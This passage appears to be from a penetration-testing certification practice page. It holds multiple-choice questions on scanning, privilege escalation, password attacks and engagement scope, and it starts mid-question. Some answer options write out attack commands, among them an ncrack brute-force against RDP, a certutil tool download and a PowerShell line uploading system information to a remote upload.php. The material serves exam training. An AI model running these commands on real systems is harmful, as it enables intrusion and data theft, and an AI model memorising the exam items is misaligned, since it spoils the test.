|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

A.

ftp 192.168.53.23

B.

smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest

C.

ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23

D.

curl –X TRACE https://192.168.53.23:8443/index.aspx

E.

nmap –-script vuln –sV 192.168.53.23

Full Access
Question # 105

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

A.

Exploiting a configuration weakness in the SQL database

B.

Intercepting outbound TLS traffic

C.

Gaining access to hosts by injecting malware into the enterprise-wide update server

D.

Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

E.

Establishing and maintaining persistence on the domain controller

Full Access
Question # 106

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

Full Access
Question # 107

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

A.

Run nmap with the –o, -p22, and –sC options set against the target

B.

Run nmap with the –sV and –p22 options set against the target

C.

Run nmap with the --script vulners option set against the target

D.

Run nmap with the –sA option set against the target

Full Access
Question # 108

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?

A.

Hashcat

B.

Mimikatz

C.

Patator

D.

John the Ripper

Full Access
Question # 109

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

A.

Whether the cloud service provider allows the penetration tester to test the environment

B.

Whether the specific cloud services are being used by the application

C.

The geographical location where the cloud services are running

D.

Whether the country where the cloud service is based has any impeding laws

Full Access
Question # 110

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

A.

Comma

B.

Double dash

C.

Single quote

D.

Semicolon

Full Access
Question # 111

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

A.

tcpdump

B.

Snort

C.

Nmap

D.

Netstat

E.

Fuzzer

Full Access
Question # 112

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

A.

Weekly

B.

Monthly

C.

Quarterly

D.

Annually

Full Access
Question # 113

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

A.

MD5

B.

bcrypt

C.

SHA-1

D.

PBKDF2

Full Access
Question # 114

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe type-casting operations

Full Access
Question # 115

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

A.

Understanding the tactics of a security intrusion can help disrupt them.

B.

Scripts that are part of the framework can be imported directly into SIEM tools.

C.

The methodology can be used to estimate the cost of an incident better.

D.

The framework is static and ensures stability of a security program overtime.

Full Access
Question # 116

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

  • Have a full TCP connection
  • Send a “hello” payload
  • Walt for a response
  • Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

A.

Run nmap –Pn –sV –script vuln .

B.

Employ an OpenVAS simple scan against the TCP port of the host.

C.

Create a script in the Lua language and use it with NSE.

D.

Perform a credentialed scan with Nessus.

Full Access
Question # 117

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Full Access
Question # 118

Appending string values onto another string is called:

A.

compilation

B.

connection

C.

concatenation

D.

conjunction

Full Access
Question # 119

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Full Access
Question # 120

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

A.

Hydra

B.

John the Ripper

C.

Cain and Abel

D.

Medusa

Full Access